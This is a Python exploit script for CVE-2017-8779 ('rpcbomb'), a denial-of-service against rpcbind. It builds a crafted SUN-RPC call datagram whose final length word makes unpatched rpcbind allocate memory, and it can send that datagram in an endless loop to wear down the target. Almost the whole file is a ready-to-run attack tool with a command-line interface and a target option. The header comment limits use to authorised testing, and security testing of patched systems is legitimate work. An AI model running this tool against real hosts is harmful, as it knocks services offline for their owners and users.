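#!/usr/bin/env python3
#
# CVE-2017-8779 aka rpcbomb.py
# python implementation of rpcbomb
# find page of bug author here: https://guidovranken.wordpress.com/
# original ruby exploit: https://www.exploit-db.com/exploits/41974
# CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779
#
# this one comes with loop and single packet, to consume memory over time and
# not just once
#
# i was not able to observe any sort of crash or alike
# on the testsystem the cpu consumption went up to 50% (1 CPU)
# memory allocation was done
# syslogd reportedly mentions out of memory from rpcbind
# depending on the environment and service offered probably interesting
#
# NOTE(review): this is a denial-of-service tool. Only point it at hosts you
# are explicitly authorised to test; in endless mode (-e) it keeps sending
# until interrupted with Ctrl-C. The code runs unchanged under Python 2.7
# and Python 3 (no print statements, no socket context manager).
#
# one packet
# ./rpcbomb.py -t 127.0.0.1
#
# define memory allocation
# ./rpcbomb.py -t 127.0.0.1 -l 1024
#
# endless mode
# ./rpcbomb.py -t 127.0.0.1 -e
#
# 2nd June 2017
# by dash

import argparse
import socket
import struct
import sys

# Largest value that fits the 32-bit XDR length word at the end of the packet.
XDR_LEN_MAX = 0xFFFFFFFF
# Seconds to wait for a reply to each packet. The target may never answer
# (e.g. when the allocation fails), which made the original recvfrom() hang
# forever; 0 restores the blocking behaviour.
DEFAULT_TIMEOUT = 5.0
# Size of the receive buffer for the (ignored) reply.
RECV_BUFSIZE = 16384


def _u32(value):
    """Encode *value* as a big-endian unsigned 32-bit word (RPC/XDR wire order)."""
    return struct.pack('!I', value)


def build_packet(paylen):
    """Return the raw SUN-RPC CALL datagram sent to rpcbind.

    The field order and labels are kept from the original PoC; the only
    variable word is *paylen*, the final 32-bit length that an unpatched
    rpcbind/libtirpc trusts when allocating (CVE-2017-8779, "rpcbomb").

    Raises ``struct.error`` when *paylen* does not fit in 32 bits; callers
    going through the CLI are validated earlier by ``xdr_length``.
    """
    words = (
        0,       # xid
        0,       # message type CALL
        2,       # RPC version 2
        100000,  # Program (portmapper / rpcbind)
        4,       # Program version
        9,       # Procedure
        0,       # Creds AUTH_NULL
        0,       # Creds len 0
        0,       # Verifier AUTH_NULL
        0,       # Verifier len 0
        0,       # Program: 0
        0,       # Ver
        4,       # Proc
        4,       # Argument length
        paylen,  # Payload length: the attacker-controlled allocation size
    )
    return b''.join(_u32(w) for w in words)


def xdr_length(text):
    """argparse ``type`` for ``-l``: an integer that fits a 32-bit XDR length.

    The original accepted any int and let ``struct.pack`` blow up with a
    traceback for values above 2**32-1 or below 0; report it as a usage
    error instead.
    """
    try:
        value = int(text)
    except ValueError:
        raise argparse.ArgumentTypeError('not an integer: %r' % text)
    if not 0 <= value <= XDR_LEN_MAX:
        raise argparse.ArgumentTypeError(
            'length must be between 0 and %d' % XDR_LEN_MAX)
    return value


def run(args):
    """Send the crafted datagram once, or forever when ``args.endless`` is set.

    ``args`` must provide ``ip``, ``port``, ``malloc`` (the XDR length) and
    ``endless``; ``timeout`` (seconds, 0 or missing attribute = default /
    block forever) is optional so older callers keep working.

    Prints one '.' per reply received and one '!' per packet that saw no
    reply within the timeout, then "Done". Ctrl-C ends endless mode cleanly.
    """
    pkt = build_packet(args.malloc)
    target = (args.ip, args.port)
    timeout = getattr(args, 'timeout', DEFAULT_TIMEOUT)

    # One socket for the whole run: the original opened a new one on every
    # iteration and never closed it, leaking a descriptor per packet in -e mode.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # settimeout(None) is "block forever"; 0 would make the socket non-blocking.
    sock.settimeout(timeout if timeout and timeout > 0 else None)
    try:
        while True:
            sock.sendto(pkt, target)
            try:
                sock.recvfrom(RECV_BUFSIZE)
                sys.stdout.write('.')
            except socket.timeout:
                sys.stdout.write('!')
            sys.stdout.flush()
            if not args.endless:
                break
    except KeyboardInterrupt:
        # Expected way to leave -e mode; fall through to the summary line.
        pass
    finally:
        sock.close()
    sys.stdout.write('\nDone\n')


def main():
    """Parse the command line and run the exploit."""
    parser_desc = 'rpcbomb - python exploit by dash'
    prog_desc = 'portbind memory exhaustion exploit'
    parser = argparse.ArgumentParser(prog=prog_desc, description=parser_desc)
    parser.add_argument("-t", "--target", action="store", required=True,
                        help='host to send exploit', dest='ip')
    parser.add_argument("-p", "--port", action="store", required=False,
                        help='port exploit to send to', dest='port',
                        default=111, type=int)
    # type=xdr_length rejects values that cannot be encoded instead of
    # crashing inside struct.pack; the default is unchanged.
    parser.add_argument("-l", "--len", action="store", required=False,
                        help='memory to allocate', dest='malloc',
                        default=XDR_LEN_MAX, type=xdr_length)
    parser.add_argument("-e", "--endless", action="store_true", required=False,
                        help='send packets constantly', dest='endless')
    parser.add_argument("-T", "--timeout", action="store", required=False,
                        help='seconds to wait for a reply per packet '
                             '(0 = wait forever)', dest='timeout',
                        default=DEFAULT_TIMEOUT, type=float)
    args = parser.parse_args()
    run(args)


if __name__ == "__main__":
    main()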